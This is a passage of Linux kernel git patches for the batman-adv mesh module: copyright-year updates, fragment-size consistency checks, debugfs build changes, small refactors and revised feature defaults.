-1,4 +1,4 @@ -/* Copyright (C) 2013-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2013-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll * diff --git a/net/batman-adv/fragmentation.h b/net/batman-adv/fragmentation.h index d848cf6676a2..ec1e86f899e8 100644 --- a/net/batman-adv/fragmentation.h +++ b/net/batman-adv/fragmentation.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2013-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2013-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll * diff --git a/net/batman-adv/gateway_client.c b/net/batman-adv/gateway_client.c index 090828cf1fa7..a85eaca344e8 100644 --- a/net/batman-adv/gateway_client.c +++ b/net/batman-adv/gateway_client.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_client.h b/net/batman-adv/gateway_client.h index 7ee53bb7d50f..185fb0887654 100644 --- a/net/batman-adv/gateway_client.h +++ b/net/batman-adv/gateway_client.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. 
contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_common.c b/net/batman-adv/gateway_common.c index 88a1bc3804d1..0792e2f101e4 100644 --- a/net/batman-adv/gateway_common.c +++ b/net/batman-adv/gateway_common.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_common.h b/net/batman-adv/gateway_common.h index aa5116561947..df5434229675 100644 --- a/net/batman-adv/gateway_common.h +++ b/net/batman-adv/gateway_common.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/hard-interface.c b/net/batman-adv/hard-interface.c index baf1f9843f2c..bdb020e29272 100644 --- a/net/batman-adv/hard-interface.c +++ b/net/batman-adv/hard-interface.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/hard-interface.h b/net/batman-adv/hard-interface.h index 1918cd50b62e..e8b6ffea703d 100644 --- a/net/batman-adv/hard-interface.h +++ b/net/batman-adv/hard-interface.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/hash.c b/net/batman-adv/hash.c index 7c1c63080e20..3a0e1dcd1f29 100644 --- a/net/batman-adv/hash.c +++ b/net/batman-adv/hash.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/hash.h b/net/batman-adv/hash.h index 539fc1266793..379e32acf2b4 100644 --- a/net/batman-adv/hash.h +++ b/net/batman-adv/hash.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/icmp_socket.c b/net/batman-adv/icmp_socket.c index 161ef8f17d2e..6c3cfb57d132 100644 --- a/net/batman-adv/icmp_socket.c +++ b/net/batman-adv/icmp_socket.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/icmp_socket.h b/net/batman-adv/icmp_socket.h index 0c33950aa4aa..4815824e2f61 100644 --- a/net/batman-adv/icmp_socket.h +++ b/net/batman-adv/icmp_socket.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index 12fc77bef23f..ca63d487c490 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 9d5657e14765..11d2d9fbfc5e 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. 
contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/multicast.c b/net/batman-adv/multicast.c index b24e4bb64fb5..09f2838dedf2 100644 --- a/net/batman-adv/multicast.c +++ b/net/batman-adv/multicast.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2014-2015 B.A.T.M.A.N. contributors: * * Linus Lüssing * diff --git a/net/batman-adv/multicast.h b/net/batman-adv/multicast.h index 3a44ebdb43cb..033d80e84fdf 100644 --- a/net/batman-adv/multicast.h +++ b/net/batman-adv/multicast.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2014-2015 B.A.T.M.A.N. contributors: * * Linus Lüssing * diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 127cc4d7380a..89e1d4772cff 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2012-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2012-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll, Jeppe Ledet-Pedersen * diff --git a/net/batman-adv/network-coding.h b/net/batman-adv/network-coding.h index 358c0d686ab0..b5ab8ff544ee 100644 --- a/net/batman-adv/network-coding.h +++ b/net/batman-adv/network-coding.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2012-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2012-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll, Jeppe Ledet-Pedersen * diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c index 90e805aba379..e3900e452616 100644 --- a/net/batman-adv/originator.c +++ b/net/batman-adv/originator.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/originator.h b/net/batman-adv/originator.h index aa4a43696295..91339143a2f7 100644 --- a/net/batman-adv/originator.h +++ b/net/batman-adv/originator.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/packet.h b/net/batman-adv/packet.h index b81fbbf21a63..9468bc09c7c4 100644 --- a/net/batman-adv/packet.h +++ b/net/batman-adv/packet.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/routing.c b/net/batman-adv/routing.c index da83982bf974..c5d90095bc3c 100644 --- a/net/batman-adv/routing.c +++ b/net/batman-adv/routing.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/routing.h b/net/batman-adv/routing.h index 557d3d12a9ab..6573f12b3ddc 100644 --- a/net/batman-adv/routing.h +++ b/net/batman-adv/routing.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/send.c b/net/batman-adv/send.c index 3d64ed20c393..fa70ae8c9fe8 100644 --- a/net/batman-adv/send.c +++ b/net/batman-adv/send.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. 
contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/send.h b/net/batman-adv/send.h index 38d0ec1833ae..60c233eb35ed 100644 --- a/net/batman-adv/send.h +++ b/net/batman-adv/send.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index 5ec31d7de24f..d85a45c24f62 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/soft-interface.h b/net/batman-adv/soft-interface.h index dbab22fd89a5..9ce08049ffd0 100644 --- a/net/batman-adv/soft-interface.h +++ b/net/batman-adv/soft-interface.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/sysfs.c b/net/batman-adv/sysfs.c index a75dc12f96f8..fa8c347bf057 100644 --- a/net/batman-adv/sysfs.c +++ b/net/batman-adv/sysfs.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/sysfs.h b/net/batman-adv/sysfs.h index b715b60db7cd..b9e79ad806ac 100644 --- a/net/batman-adv/sysfs.h +++ b/net/batman-adv/sysfs.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c index 07b263a437d1..b098e53edded 100644 --- a/net/batman-adv/translation-table.c +++ b/net/batman-adv/translation-table.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich, Antonio Quartulli * diff --git a/net/batman-adv/translation-table.h b/net/batman-adv/translation-table.h index ad84d7b89e39..5769037c7e2d 100644 --- a/net/batman-adv/translation-table.h +++ b/net/batman-adv/translation-table.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich, Antonio Quartulli * diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index 9398c3fb4174..28f2461ea630 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich *
From 53e771457e823fbc21834f60508c42a4270534fd Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Mon, 1 Dec 2014 10:37:27 +0100 Subject: [PATCH 442/872] batman-adv: Check total_size when queueing fragments MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The fragmentation code was replaced in 610bfc6bc99bc83680d190ebc69359a05fc7f605 ("batman-adv: Receive fragmented packets and merge") by an implementation which handles the queueing+merging of fragments based on their size and the total_size of the non-fragmented packet. This total_size is announced by each fragment. The new implementation doesn't check if the total_size information of the packets inside one chain is consistent. This consistency check is recommended to allow using any of the packets in the queue to decide whether all fragments of a packet are received or not. Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/fragmentation.c | 7 +++++-- net/batman-adv/types.h | 2 ++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index af495cc861fe..a9fc6537214b 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ -161,6 +161,7 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, hlist_add_head(&frag_entry_new->list, &chain->head); chain->size = skb->len - hdr_size; chain->timestamp = jiffies; + chain->total_size = ntohs(frag_packet->total_size); ret = true; goto out; } @@ -195,9 +196,11 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, out: if (chain->size > batadv_frag_size_limit() || - ntohs(frag_packet->total_size) > batadv_frag_size_limit()) { + chain->total_size != ntohs(frag_packet->total_size) || + chain->total_size > batadv_frag_size_limit()) { /* Clear chain if total size of either the list or the packet - * exceeds the maximum size of one merged packet. + * exceeds the maximum size of one merged packet. Don't allow + * packets to have different total_size. */ batadv_frag_clear_chain(&chain->head); chain->size = 0; diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index 28f2461ea630..e95db4273356 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -132,6 +132,7 @@ struct batadv_orig_ifinfo { * @timestamp: time (jiffie) of last received fragment * @seqno: sequence number of the fragments in the list * @size: accumulated size of packets in list + * @total_size: expected size of the assembled packet */ struct batadv_frag_table_entry { struct hlist_head head; @@ -139,6 +140,7 @@ struct batadv_frag_table_entry { unsigned long timestamp; uint16_t seqno; uint16_t size; + uint16_t total_size; }; /**
From 83e8b87721f21b26b843633caca8ef453e943623 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Mon, 1 Dec 2014 10:37:28 +0100 Subject: [PATCH 443/872] batman-adv: Use only queued fragments when merging MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The fragment queueing code now validates the total_size of each fragment, checks when enough fragments are queued to allow merging them into a single packet and whether the fragments have the correct size. Therefore, it is not required to have any other parameter for the merging function than a list of queued fragments. This change should avoid problems like those seen in the past, when the skb taken from the list and the one passed as a function parameter were mixed up incorrectly. Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/fragmentation.c | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index a9fc6537214b..6ce3c84a7e55 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ -231,19 +231,13 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, * Returns the merged skb or NULL on error.
*/ static struct sk_buff * -batadv_frag_merge_packets(struct hlist_head *chain, struct sk_buff *skb) +batadv_frag_merge_packets(struct hlist_head *chain) { struct batadv_frag_packet *packet; struct batadv_frag_list_entry *entry; struct sk_buff *skb_out = NULL; int size, hdr_size = sizeof(struct batadv_frag_packet); - /* Make sure incoming skb has non-bogus data. */ - packet = (struct batadv_frag_packet *)skb->data; - size = ntohs(packet->total_size); - if (size > batadv_frag_size_limit()) - goto free; - /* Remove first entry, as this is the destination for the rest of the * fragments. */ @@ -252,6 +246,9 @@ batadv_frag_merge_packets(struct hlist_head *chain, struct sk_buff *skb) skb_out = entry->skb; kfree(entry); + packet = (struct batadv_frag_packet *)skb_out->data; + size = ntohs(packet->total_size); + /* Make room for the rest of the fragments. */ if (pskb_expand_head(skb_out, 0, size - skb_out->len, GFP_ATOMIC) < 0) { kfree_skb(skb_out); @@ -307,7 +304,7 @@ bool batadv_frag_skb_buffer(struct sk_buff **skb, if (hlist_empty(&head)) goto out; - skb_out = batadv_frag_merge_packets(&head, *skb); + skb_out = batadv_frag_merge_packets(&head); if (!skb_out) goto out_err; From 9bb218828c8f4fa6587af93e248903c96ce469d0 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:18 +0100 Subject: [PATCH 444/872] batman-adv: debugfs, avoid compiling for !DEBUG_FS Normally the debugfs framework will return error pointer with -ENODEV for function calls when DEBUG_FS is not set. batman does not notice this error code and continues trying to create debugfs files and executes more code. We can avoid this code execution by disabling compiling debugfs.c when DEBUG_FS is not set. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- net/batman-adv/debugfs.c | 8 -------- net/batman-adv/debugfs.h | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 35 insertions(+), 9 deletions(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index 79833ebcc2dd..bd7e343c98d1 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -20,7 +20,7 @@ obj-$(CONFIG_BATMAN_ADV) += batman-adv.o batman-adv-y += bat_iv_ogm.o batman-adv-y += bitarray.o batman-adv-$(CONFIG_BATMAN_ADV_BLA) += bridge_loop_avoidance.o -batman-adv-y += debugfs.o +batman-adv-$(CONFIG_DEBUG_FS) += debugfs.o batman-adv-$(CONFIG_BATMAN_ADV_DAT) += distributed-arp-table.o batman-adv-y += fragmentation.o batman-adv-y += gateway_client.o diff --git a/net/batman-adv/debugfs.c b/net/batman-adv/debugfs.c index 0c213a892296..46118084221a 100644 --- a/net/batman-adv/debugfs.c +++ b/net/batman-adv/debugfs.c @@ -482,11 +482,7 @@ int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface) debugfs_remove_recursive(hard_iface->debug_dir); hard_iface->debug_dir = NULL; out: -#ifdef CONFIG_DEBUG_FS return -ENOMEM; -#else - return 0; -#endif /* CONFIG_DEBUG_FS */ } /** @@ -541,11 +537,7 @@ int batadv_debugfs_add_meshif(struct net_device *dev) debugfs_remove_recursive(bat_priv->debug_dir); bat_priv->debug_dir = NULL; out: -#ifdef CONFIG_DEBUG_FS return -ENOMEM; -#else - return 0; -#endif /* CONFIG_DEBUG_FS */ } void batadv_debugfs_del_meshif(struct net_device *dev) diff --git a/net/batman-adv/debugfs.h b/net/batman-adv/debugfs.h index f3b49c394446..ed25605ca732 100644 --- a/net/batman-adv/debugfs.h +++ b/net/batman-adv/debugfs.h @@ -20,6 +20,8 @@ #define BATADV_DEBUGFS_SUBDIR "batman_adv" +#if IS_ENABLED(CONFIG_DEBUG_FS) + void batadv_debugfs_init(void); void 
batadv_debugfs_destroy(void); int batadv_debugfs_add_meshif(struct net_device *dev); @@ -27,4 +29,36 @@ void batadv_debugfs_del_meshif(struct net_device *dev); int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface); void batadv_debugfs_del_hardif(struct batadv_hard_iface *hard_iface); +#else + +static inline void batadv_debugfs_init(void) +{ +} + +static inline void batadv_debugfs_destroy(void) +{ +} + +static inline int batadv_debugfs_add_meshif(struct net_device *dev) +{ + return 0; +} + +static inline void batadv_debugfs_del_meshif(struct net_device *dev) +{ +} + +static inline +int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface) +{ + return 0; +} + +static inline +void batadv_debugfs_del_hardif(struct batadv_hard_iface *hard_iface) +{ +} + +#endif + #endif /* _NET_BATMAN_ADV_DEBUGFS_H_ */ From 16b9ce83fb850602794a3bc534693362408a5408 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:23 +0100 Subject: [PATCH 445/872] batman-adv: tvlv realloc, move error handling into if block Instead of hiding the normal function flow inside an if block, we should just put the error handling into the if block. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index ca63d487c490..fd9333dffc97 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -819,15 +819,15 @@ static bool batadv_tvlv_realloc_packet_buff(unsigned char **packet_buff, new_buff = kmalloc(min_packet_len + additional_packet_len, GFP_ATOMIC); /* keep old buffer if kmalloc should fail */ - if (new_buff) { - memcpy(new_buff, *packet_buff, min_packet_len); - kfree(*packet_buff); - *packet_buff = new_buff; - *packet_buff_len = min_packet_len + additional_packet_len; - return true; - } + if (!new_buff) + return false; + + memcpy(new_buff, *packet_buff, min_packet_len); + kfree(*packet_buff); + *packet_buff = new_buff; + *packet_buff_len = min_packet_len + additional_packet_len; - return false; + return true; } /** From 9fc1883ef25a43b895531ac44a38257ba8c2ca62 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:25 +0100 Subject: [PATCH 446/872] batman-adv: Makefile, Sort alphabetically The whole Makefile is sorted, just the multicast rule is not at the right position. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index bd7e343c98d1..21434ab79d2c 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -29,6 +29,7 @@ batman-adv-y += hard-interface.o batman-adv-y += hash.o batman-adv-y += icmp_socket.o batman-adv-y += main.o +batman-adv-$(CONFIG_BATMAN_ADV_MCAST) += multicast.o batman-adv-$(CONFIG_BATMAN_ADV_NC) += network-coding.o batman-adv-y += originator.o batman-adv-y += routing.o @@ -36,4 +37,3 @@ batman-adv-y += send.o batman-adv-y += soft-interface.o batman-adv-y += sysfs.o batman-adv-y += translation-table.o -batman-adv-$(CONFIG_BATMAN_ADV_MCAST) += multicast.o From 42d9f2cbd42e1ba137584da8305cf6f68b84f39d Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:26 +0100 Subject: [PATCH 447/872] batman-adv: iv_ogm_iface_enable, direct return values Directly return error values. No need to use a return variable. 
Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index fc299c03a438..123aabbcb003 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -308,7 +308,6 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) struct batadv_ogm_packet *batadv_ogm_packet; unsigned char *ogm_buff; uint32_t random_seqno; - int res = -ENOMEM; /* randomize initial seqno to avoid collision */ get_random_bytes(&random_seqno, sizeof(random_seqno)); @@ -317,7 +316,7 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) hard_iface->bat_iv.ogm_buff_len = BATADV_OGM_HLEN; ogm_buff = kmalloc(hard_iface->bat_iv.ogm_buff_len, GFP_ATOMIC); if (!ogm_buff) - goto out; + return -ENOMEM; hard_iface->bat_iv.ogm_buff = ogm_buff; @@ -329,10 +328,7 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) batadv_ogm_packet->reserved = 0; batadv_ogm_packet->tq = BATADV_TQ_MAX_VALUE; - res = 0; - -out: - return res; + return 0; } static void batadv_iv_ogm_iface_disable(struct batadv_hard_iface *hard_iface) From 9fd9b19ea03cce2e47544a3b8e0b532485b34758 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:27 +0100 Subject: [PATCH 448/872] batman-adv: iv_ogm_aggr_packet, bool return value This function returns bool values, so it should be defined to return them instead of the whole int range. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 123aabbcb003..00151385ad11 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -392,8 +392,8 @@ static uint8_t batadv_hop_penalty(uint8_t tq, } /* is there another aggregated packet here? */ -static int batadv_iv_ogm_aggr_packet(int buff_pos, int packet_len, - __be16 tvlv_len) +static bool batadv_iv_ogm_aggr_packet(int buff_pos, int packet_len, + __be16 tvlv_len) { int next_buff_pos = 0; From de12baece9b8010d036b4104a9f08d21418b60e8 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:28 +0100 Subject: [PATCH 449/872] batman-adv: iv_ogm_send_to_if, declare char* as const This string pointer is later assigned to a constant string, so it should be defined constant at the beginning. 
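For illustration only, a tiny stand-alone C sketch of the point being made (the function name and strings here are made up for the sketch, not taken from bat_iv_ogm.c): a pointer that is only ever assigned string literals should be declared const so the compiler rejects accidental writes through it.

#include <stdio.h>

static void print_ogm_kind(int forwarded)
{
        /* Only string literals are ever assigned here, so "const char *"
         * documents that and lets the compiler catch any attempt to
         * modify the pointed-to text.
         */
        const char *fwd_str = forwarded ? "Forwarding packet" : "Sending own packet";

        printf("%s\n", fwd_str);
}

int main(void)
{
        print_ogm_kind(1);
        print_ogm_kind(0);
        return 0;
}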
Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 00151385ad11..f9c561094942 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -409,7 +409,7 @@ static void batadv_iv_ogm_send_to_if(struct batadv_forw_packet *forw_packet, struct batadv_hard_iface *hard_iface) { struct batadv_priv *bat_priv = netdev_priv(hard_iface->soft_iface); - char *fwd_str; + const char *fwd_str; uint8_t packet_num; int16_t buff_pos; struct batadv_ogm_packet *batadv_ogm_packet;
From dab7b62190c5abbe90eef4e9f9e7c28492e77eba Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Wed, 18 Feb 2015 18:20:24 +0100 Subject: [PATCH 450/872] batman-adv: Use safer default config for optional features MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The current default settings for optional features in batman-adv seem to be based around the idea that the user only compiles what he requires. They are automatically enabled when they are compiled in. For example the network coding part of batman-adv is by default disabled in the out-of-tree module but will be enabled when the code is compiled during the module build. But distributions like Debian just enable all features of the batman-adv kernel module and hope that more experimental features or features with possible negative effects have to be enabled using some runtime configuration interface. The network_coding feature can help in specific setups but also has drawbacks and is not disabled by default in the out-of-tree module. Disabling it by default in the runtime config also seems quite sane. The bridge_loop_avoidance is the only feature which is disabled by default but may be necessary even in simple setups. Packet loops may even be created during the initial node setup when this is not enabled. This is different from STP on bridges because the mesh is usually used on ad-hoc WiFi. Having two nodes (by accident) in the same LAN segment and in the same mesh network is rather common in this situation.
Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/network-coding.c | 2 +- net/batman-adv/soft-interface.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 89e1d4772cff..4cb70bb4c3e8 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -155,7 +155,7 @@ int batadv_nc_mesh_init(struct batadv_priv *bat_priv) */ void batadv_nc_init_bat_priv(struct batadv_priv *bat_priv) { - atomic_set(&bat_priv->network_coding, 1); + atomic_set(&bat_priv->network_coding, 0); bat_priv->nc.min_tq = 200; bat_priv->nc.max_fwd_delay = 10; bat_priv->nc.max_buffer_time = 200; diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index d85a45c24f62..9426b83caab6 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -732,7 +732,7 @@ static int batadv_softif_init_late(struct net_device *dev) atomic_set(&bat_priv->aggregated_ogms, 1); atomic_set(&bat_priv->bonding, 0); #ifdef CONFIG_BATMAN_ADV_BLA - atomic_set(&bat_priv->bridge_loop_avoidance, 0); + atomic_set(&bat_priv->bridge_loop_avoidance, 1); #endif #ifdef CONFIG_BATMAN_ADV_DAT atomic_set(&bat_priv->distributed_arp_table, 1); From 00f548bf5494ade996ae9c5e85c497dd2a3fdad5 Mon Sep 17 00:00:00 2001 From: Marek Lindner Date: Wed, 18 Feb 2015 22:17:30 +0800 Subject: [PATCH 451/872] batman-adv: checkpatch - comparison to NULL could be rewritten Signed-off-by: Marek Lindner --- net/batman-adv/soft-interface.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index 9426b83caab6..50cf722f4e1b 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -818,7 +818,7 @@ static int batadv_softif_slave_add(struct net_device *dev, int ret = -EINVAL; 